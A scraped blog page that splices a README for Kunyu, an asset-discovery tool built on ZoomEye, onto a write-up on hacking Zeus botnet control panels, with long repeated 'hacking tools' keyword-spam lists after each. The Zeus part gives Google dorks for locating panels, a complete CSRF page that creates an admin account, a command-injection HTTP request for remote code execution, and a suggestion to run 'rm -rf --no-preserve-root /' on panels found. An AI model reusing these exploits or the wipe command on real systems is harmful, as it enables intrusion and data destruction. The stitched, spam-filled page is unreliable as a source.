miércoles, 31 de mayo de 2023

Kunyu - More Efficient Corporate Asset Collection


0x00 Introduce

Tool introduction

Kunyu (kunyu), whose name is taken from , is actually a professional subject related to geographic information, which counts the geographic information of the sea, land, and sky. The same applies to cyberspace. The same is true for discovering unknown and fragile assets. It is more like a cyberspace map, which is used to comprehensively describe and display cyberspace assets, various elements of cyberspace and the relationship between elements, as well as cyberspace and real space. The mapping relationship. So I think "Kun Yu" still fits this concept.

Kunyu aims to make corporate asset collection more efficient and enable more security-related practitioners to understand and use cyberspace surveying and mapping technology.


Application scenario

For the use of kunyu, there can be many application scenarios, such as:

  • Forgotten and isolated assets in the enterprise are identified and added to security management.
  • Perform quick investigation and statistics on externally exposed assets of the enterprise.
  • Red and blue are used against related requirements, and batch inspections of captured IPs are performed.
  • Collect vulnerable assets in batches (0day/1day) for equipment and terminals within the impact.
  • Information on sites involved in new-type cybercrime cases is quickly collected and merged for more efficient research, judgment, and analysis.
  • Statistic and reproduce the fragile assets on the Internet that are affected by related vulnerabilities.

0x01 Install

Need Python3 or higher support

git clone https://github.com/knownsec/Kunyu.git
cd Kunyu
pip3 install -r requirements.txt

Linux:
python3 setup.py install
kunyu console

Windows:
cd kunyu
python3 console.py

PYPI:
pip3 install kunyu

P.S. Windows also supports python3 setup.py install.

0x02 Configuration instructions

When you run the program for the first time, you can initialize by entering the following command. Other login methods are provided. However, it is recommended to use the API method. Because the user name/password login requires an additional request, the API method is theoretically more efficient.

kunyu init --apikey <your zoomeye key> --seebug <your seebug key>



You need to log in with ZoomEye credentials before using this tool for information collection.

Visit address: https://www.zoomeye.org/

The output file path can be customized by the following command

kunyu init --output C:\Users\风起\kunyu\output



0x03 Tool instructions

Detailed command

kunyu console


 

ZoomEye

Encryption method interface HostCrash <IP> <Domain> Host Header Scan hidden assets Seebug <Query> Search Seebug vulnerability information set <Option> Set arguments values Pocsuite3 Invoke the pocsuite component ExportPath Returns the path of the output file clear Clear the console screen show Show can set options help Print Help info exit Exit KunYu & ">
Global commands:
info Print User info
SearchHost <query> Basic Host search
SearchWeb <query> Basic Web search
SearchIcon <File>/<URL> Icon Image search
SearchBatch <File> Batch search Host
SearchCert <Domain> SSL certificate Search
SearchDomain <Domain> Domain name associated/subdomain search
EncodeHash <encryption> <query> Encryption method interface
HostCrash <IP> <Domain> Host Header Scan hidden assets
Seebug <Query> Search Seebug vulnerability information
set <Option> Set arguments values
Pocsuite3 Invoke the pocsuite component
ExportPath Returns the path of the output file
clear Clear the console screen
show Show can set options
help Print Help info
exit Exit KunYu &

OPTIONS

ZoomEye:
page <Number> The number of pages returned by the query
dtype <0/1> Query associated domain name/subdomain name
btype <host/web> Set the API interface for batch query

Use case introduction

Here we use the ZoomEye module for demonstration

User information query


HOST host search


Web host search


Batch IP search


Icon Search

When collecting corporate assets, we can use this method to retrieve the same ico icon assets, which usually has a good effect when associating related corporate assets. But it should be noted that if some sites also use this ico icon, irrelevant assets may be associated (but people who are bored with other people's ico icons are always in the minority). Support url or local file search.



 

SSL certificate search

Query through the serial number of the SSL certificate, so that the associated assets are more accurate, and services that use the same certificate can be searched. When you encounter an https site, you can use this method.



Multi-factor query

Similarly, Kunyu also supports multi-factor conditional query related assets, which can be realized through ZoomEye logic operation syntax.


 

Feature Search

Through HTTP request packet features or website-related features, the same framework assets can be concatenated more accurately



Associated Domain/Subdomain Search

Search for associated domain names and subdomains, and query associated domain names by default. Two modes can be set by setting the dtype parameter.


 

Encoding hash calculation

In some scenarios, you can use this command to perform common HASH encryption/encoding, such as BASE64, MD5, mmh3, HEX encoding, and debug in this way.



Seebug vulnerability query

You can query historical related vulnerabilities by entering information about the framework and equipment you want to find, but you need to note that only English is supported, and improvements and upgrades will be made later.



Setting parameters

When set page = 2, the returned results are 40. You can modify the page parameter to set the number of pages to be queried. Note that 1 page = 20/items. You can modify the value according to your needs to get more returned results.

The configurable parameters and the current values of the parameters are displayed through show.


 


Pocsuite linkage

In versions after v1.3.1, you can use kunyu to link the console mode of pocsuite3 for integrated use.



HOSTS head collision

Through the HOSTS collision, the hidden assets in the intranet can be effectively collided, and the intranet service can be accessed according to the ServerName domain name and IP configured in the middleware httpf.conf. This can be achieved by setting the local hosts file later, because the local hosts file takes precedence. The level is higher than DNS server resolution. Support reverse check through ZoomEye domain name library or read TXT file to get the list of domain names.

HOSTS cross collision



Data result

All search results are saved in the user's root directory, and the directory is created based on the current timestamp. All query results of a single start are stored in an Excel format under one directory, giving a more intuitive experience. The output path can be returned through the ExportPath command.



0x04 Loading

​ In fact, there are still many ideas, but as an Alpha version, this is the case, and it will continue to be improved in the later period. I hope that Kunyu can be known to more security practitioners. Thank you for your support.

​ The tool framework has reference to Kunlun Mirror and Pocsuite3, which are all very good works.

​ Thanks to all the friends of KnownSec 404 Team.

" 看得清 " 是能力的体现,是 " 器 " ,而 " 看得见 " 就是思想的体现,那最后关联的是 " 道 "。

​ --SuperHei


0x05 Issue

1、Multi-factor search

ZoomEye search can use multi-factor search, dork:cisco +port:80 (note the space) can search all data that meet the conditions of cisco and port:80, if there is no space in between, it is the same search condition, it is that cisco is satisfied and the port is All data for 80. Kunyu's dork does not require quotation marks.

2、High-precision geographical location

ZoomEye gives privileged users high-precision geographic location data, but it should be noted that ordinary users do not have this function, so I hope you know.

3、Username/password login

If you use username/password as the initialization condition, the token will be valid for 12 hours. If you find that your search cannot return data, you may wish to info. If the session times out, the initialization command prompt will be returned. In most cases, we recommend that you use the API KEY method, there is no invalidation problem. This design is also for the security of your account and password. After all, the API KEY can be reset and the token will become invalid. However, with the account and password, it is possible to log in to your ZoomEye account.

4、Cert certificate search

It should be noted that, according to the normal logic, you need to encode the serial number of the target SSL certificate in hexadecimal to match the sentence search, but Kunyu only needs to provide the Domain address to search. The principle is to make a request to the target station to obtain the serial number and process it, but if your host cannot access the target that needs to be searched, it cannot be retrieved. At this time, you can also search with the sentence in the usual way.

5、Favicon icon search

ico icon search not only supports URL retrieval, but also supports local ico icon file search, which has better scalability and compatibility.

6、Query data save path

By default, your query data is in the Kunyu folder under the user directory. You can also use the ExportPath command to query the path in the console mode.

7、Autocomplete

Kunyu's auto-completion supports upper and lower case, command logging, etc., use Tab to complete, please refer to Metasploit for usage.

8. Regarding the error when using pip install kunyu

The following error was reported when using pip install kunyu: File "C:\Users\风起\AppData\Local\Programs\Python\Python37\Scripts\kunyu-script.py", line 1 SyntaxError: Non-UTF-8 code starting with'\xb7' in file C: \Users\风起\AppData\Local\Programs\Python\Python37\Scripts\kunyu-script.py on line 1, but no encoding declared; see http://python.org/dev/peps/pep-0263/ for details

solution: Modify the C:\Users\风起\AppData\Local\Programs\Python\Python37\Scripts\kunyu-script.py file and add # encoding: utf-8 at the beginning of the file.

Then save it and you can use it normally. The bug appears because there is a Chinese name in the user's directory path, which usually appears on windows.

9. Pocsuite3 module POC storage directory

When using the pocsuite3 module, if you want to add a new POC module, you can add a POC file in project directory/kunyu/pocs/.

10. Pocsuite3 module POC missing issue

When using the Pocsuite command linkage, if it is a packaged Kunyu version, the poc has been fixed. At this time, modifying the poc directory cannot add new modules. At this time, you can repackage it or use the project directory/kunyu /console.py Run kunyu to update the poc module in real time.


0x06 Contributions

风起@knownsec 404
wh0am1i@knownsec 404
fenix@knownsec 404
0x7F@knownsec 404


0x07 Community

If you have any questions, you can submit an issue under the project, or contact us through the following methods.

Scan the QR code to add the ZoomEye staff member WeChat, and remark Kunyu, which will draw everyone to the ZoomEye cyberspace surveying and mapping exchange group




More info

  1. Pentest Tools Find Subdomains
  2. Hacking Tools Download
  3. Hacking Tools 2020
  4. Nsa Hack Tools Download
  5. How To Install Pentest Tools In Ubuntu
  6. Hacking Tools Download
  7. Hacking Tools Mac
  8. Hacking Tools Mac
  9. Blackhat Hacker Tools
  10. Hack And Tools
  11. Pentest Tools For Ubuntu
  12. Pentest Tools Bluekeep
  13. Hackrf Tools
  14. Hacking Tools Windows 10
  15. Hacker Tool Kit
  16. Tools Used For Hacking
  17. Hacking Tools Download
  18. Physical Pentest Tools
  19. Hak5 Tools
  20. Hacking Tools Name
  21. Hacker Tools For Mac
  22. World No 1 Hacker Software
  23. Hacker Tools Mac
  24. Pentest Tools List
  25. Hacking Tools Github
  26. Hacker Tools Online
  27. Android Hack Tools Github
  28. Hacker Tools For Ios
  29. Hacker Tools For Mac
  30. Tools For Hacker
  31. Hacker Tools List
  32. Hacker
  33. Pentest Tools For Ubuntu
  34. Hacking Tools Github
  35. Nsa Hack Tools
  36. Best Hacking Tools 2019
  37. Hacker Tools Windows
  38. Hack Tools Online
  39. Hacker Tools Mac
  40. Black Hat Hacker Tools
  41. Hack Tools For Pc
  42. Hacking Tools Mac
  43. Hacking Tools For Beginners
  44. Pentest Tools Free
  45. Hack Tool Apk No Root
  46. Hak5 Tools
  47. Free Pentest Tools For Windows
  48. Hacker Tools
  49. Hackrf Tools
  50. Hack Tools For Games
  51. Pentest Tools Free
  52. Hacker Techniques Tools And Incident Handling
  53. Hacking Tools For Mac
  54. Hacker Tools 2019
  55. Hacker Tools Windows
  56. Pentest Reporting Tools
  57. Hack Tools Online
  58. Hacker Tools Apk
  59. Hacking Tools Kit
  60. Hacking App
  61. Hacking Tools Kit
  62. Usb Pentest Tools
  63. Hack Apps
  64. Pentest Tools Free
  65. What Are Hacking Tools
  66. Hackers Toolbox
  67. New Hack Tools
  68. Nsa Hacker Tools
  69. New Hack Tools
  70. Hacker Search Tools
  71. Hackrf Tools
  72. Usb Pentest Tools
  73. Pentest Tools Github
  74. Hacking Tools Usb
  75. Hacker Tools List
  76. Hackrf Tools
  77. Pentest Tools Framework
  78. Hacking Tools Windows
  79. Github Hacking Tools
  80. Pentest Tools Apk
  81. Hacker Tools Windows
  82. Hacking Tools For Mac
  83. Hacker Tools Software
  84. Pentest Tools Subdomain
  85. Hacking Tools For Windows 7
  86. Best Hacking Tools 2020
  87. Hacker
  88. Pentest Tools Open Source
  89. Pentest Tools Framework
  90. Top Pentest Tools
  91. Beginner Hacker Tools
  92. Pentest Recon Tools
  93. Hack Tools For Ubuntu
  94. Pentest Tools Find Subdomains
  95. Hacking Tools For Kali Linux
  96. Game Hacking
  97. Pentest Tools Review
  98. Free Pentest Tools For Windows
  99. Hacking Tools For Windows
  100. Nsa Hack Tools
  101. Hackrf Tools
  102. Best Hacking Tools 2020
  103. Hacking Tools 2020
  104. Hacker Search Tools
  105. Hack Website Online Tool
  106. Hacking Tools And Software
  107. Hacker Tools 2020
  108. Hackers Toolbox
  109. Hack Rom Tools
  110. Pentest Tools For Android
  111. Hack Tools Download
  112. Pentest Tools Tcp Port Scanner
  113. Install Pentest Tools Ubuntu
  114. Hack Rom Tools
  115. Wifi Hacker Tools For Windows
  116. Pentest Tools For Ubuntu
  117. Hacker Tool Kit
  118. Hacker Tools For Ios
  119. Hacking Tools Usb
  120. How To Make Hacking Tools
  121. Hak5 Tools
  122. Hacker Tools 2019
  123. How To Make Hacking Tools
  124. Github Hacking Tools
  125. Free Pentest Tools For Windows
  126. New Hack Tools
  127. Hacking Tools For Beginners
  128. Hacker Tools Free
  129. Pentest Tools
  130. Hack Tools Download

Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:
  • inurl:cp.php?m=login - this should be the login to the control panel
  • inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
  • inurl:install/index.php - this should be deleted, but I think this is useless now.


Boring vulns found

Update: You can use the CSRF to create a new user with admin privileges:
<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html> 
  • MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
  • ClickJacking - really boring stuff
  • Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
  • SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)


The following stuff looks good, at least some vulns were taken seriously:
  • The system directory is protected with .htaccess deny from all.
  • gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
  • Anti XSS: the following code is used almost everywhere
  • return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');
    My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)


And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler:
POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1 
because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)
More info

  1. Hacking App
  2. Black Hat Hacker Tools
  3. Hacking Apps
  4. Underground Hacker Sites
  5. Hack Tools
  6. Hacking Tools Free Download
  7. Android Hack Tools Github
  8. Hack Rom Tools
  9. What Is Hacking Tools
  10. Hacking Tools 2019
  11. Pentest Box Tools Download
  12. Android Hack Tools Github
  13. Hacker Tools Mac
  14. Hacking Tools Download
  15. Hacking Tools For Kali Linux
  16. Hacking Tools Download
  17. Hacker Tools
  18. Hacking App
  19. Pentest Tools Bluekeep
  20. Hacker Tools For Ios
  21. Black Hat Hacker Tools
  22. Hack Tools
  23. Pentest Tools Port Scanner
  24. Pentest Tools Alternative
  25. Nsa Hack Tools Download
  26. Hack Tool Apk
  27. Hacking Tools Online
  28. What Is Hacking Tools
  29. Pentest Tools
  30. Tools Used For Hacking
  31. Pentest Tools Review
  32. Hacker Tools Linux
  33. Hackrf Tools
  34. Usb Pentest Tools
  35. Blackhat Hacker Tools
  36. Hack Tools Mac
  37. What Are Hacking Tools
  38. Top Pentest Tools
  39. How To Install Pentest Tools In Ubuntu
  40. Ethical Hacker Tools
  41. Hack Tools For Games
  42. Pentest Tools Windows
  43. Hacking Tools For Pc
  44. Hack Tools
  45. Pentest Tools For Android
  46. Hack Tools 2019
  47. Tools 4 Hack
  48. Android Hack Tools Github
  49. Hacking Tools Windows
  50. Pentest Tools Open Source
  51. Pentest Tools Linux
  52. Hacking Tools Kit
  53. Free Pentest Tools For Windows
  54. Hacker Tools For Ios
  55. Pentest Tools Windows
  56. New Hacker Tools
  57. Hacker Tools Apk Download
  58. Game Hacking
  59. Install Pentest Tools Ubuntu
  60. Hacking Tools For Kali Linux
  61. Pentest Tools Kali Linux
  62. Hack Tools For Mac
  63. Nsa Hack Tools Download
  64. Hacking Tools For Windows Free Download
  65. Pentest Tools Url Fuzzer
  66. Hack Tools 2019
  67. Beginner Hacker Tools
  68. Hacker Tools For Mac
  69. Pentest Tools For Mac
  70. Hacking Tools Usb
  71. Hacking Tools Windows
  72. Hack Tools Pc
  73. How To Make Hacking Tools
  74. Pentest Tools Port Scanner
  75. Nsa Hack Tools
  76. Pentest Tools Website Vulnerability
  77. What Are Hacking Tools
  78. Black Hat Hacker Tools
  79. Hacker Tools 2020
  80. Android Hack Tools Github
  81. Pentest Tools Website Vulnerability
  82. Pentest Tools Linux
  83. New Hack Tools
  84. Hacker Tools For Ios
  85. Hack App
  86. Physical Pentest Tools
  87. Pentest Tools
  88. Hack Tools
  89. Growth Hacker Tools
  90. Hacker Hardware Tools
  91. Wifi Hacker Tools For Windows
  92. Pentest Tools Download
  93. Hacking Tools Windows
  94. Hacking Tools For Mac
  95. Hack Tools For Mac
  96. Hacker Tools For Ios
  97. Beginner Hacker Tools
  98. Tools 4 Hack
  99. Hack Tools Online
  100. Hacking Tools Mac
  101. Hacking Tools Github
  102. Hacker Tools Free
  103. Pentest Tools Tcp Port Scanner
  104. Hack Tools Github
  105. Hacker Tools Apk Download
  106. Hacker Tools 2019
  107. Growth Hacker Tools
  108. Pentest Tools Android
  109. Computer Hacker
  110. Pentest Tools For Windows
  111. Pentest Automation Tools
  112. Tools For Hacker
  113. Blackhat Hacker Tools
  114. Hacker Tools 2020
  115. Hack Tools For Windows
  116. Hack Tools Online
  117. Hack Tools For Windows
  118. Top Pentest Tools
  119. Pentest Tools Port Scanner
  120. Pentest Automation Tools
  121. Nsa Hacker Tools
  122. Hack Tools Mac
  123. Hacker Techniques Tools And Incident Handling
  124. Hacking Tools For Windows Free Download
  125. Blackhat Hacker Tools
  126. Hack Tools Github
  127. Kik Hack Tools
  128. Usb Pentest Tools
  129. Pentest Tools Website Vulnerability
  130. Pentest Automation Tools
  131. Pentest Tools Github
  132. Pentest Tools Nmap
  133. Hack Tools 2019
  134. Hacker Search Tools
  135. Install Pentest Tools Ubuntu
  136. Growth Hacker Tools
  137. Hacker Tools Apk
  138. Pentest Tools Review
  139. Hacker Tools Free Download
  140. Hacking Tools Windows
  141. Pentest Tools Apk
  142. Pentest Reporting Tools
  143. Usb Pentest Tools
  144. Pentest Reporting Tools
  145. Hack Tools Pc
  146. Bluetooth Hacking Tools Kali
  147. Hacking Tools Online
  148. Pentest Tools Download
  149. Hacker Search Tools
  150. Hacking Tools Github
  151. Hacking Tools Hardware
  152. Hacking Tools For Pc
  153. Best Pentesting Tools 2018
  154. Pentest Tools Framework
  155. Hacking Tools For Windows
  156. World No 1 Hacker Software
  157. Pentest Tools Website Vulnerability
  158. Pentest Tools Online
  159. Hacker Tools 2019
  160. Hacker Tools 2020
  161. Hack Tools 2019
  162. Nsa Hacker Tools
  163. Game Hacking
  164. Hacking Tools Usb
  165. Hacker Tools Mac
  166. Hacking Tools For Mac
  167. Hacker Tools Apk Download
  168. Pentest Tools Website
  169. Pentest Tools Free
  170. Pentest Tools List
  171. Pentest Tools Free
  172. Hacking Tools Windows 10
  173. Hacking Tools Software
  174. Pentest Tools Open Source
  175. How To Install Pentest Tools In Ubuntu
  176. Hack Tools For Games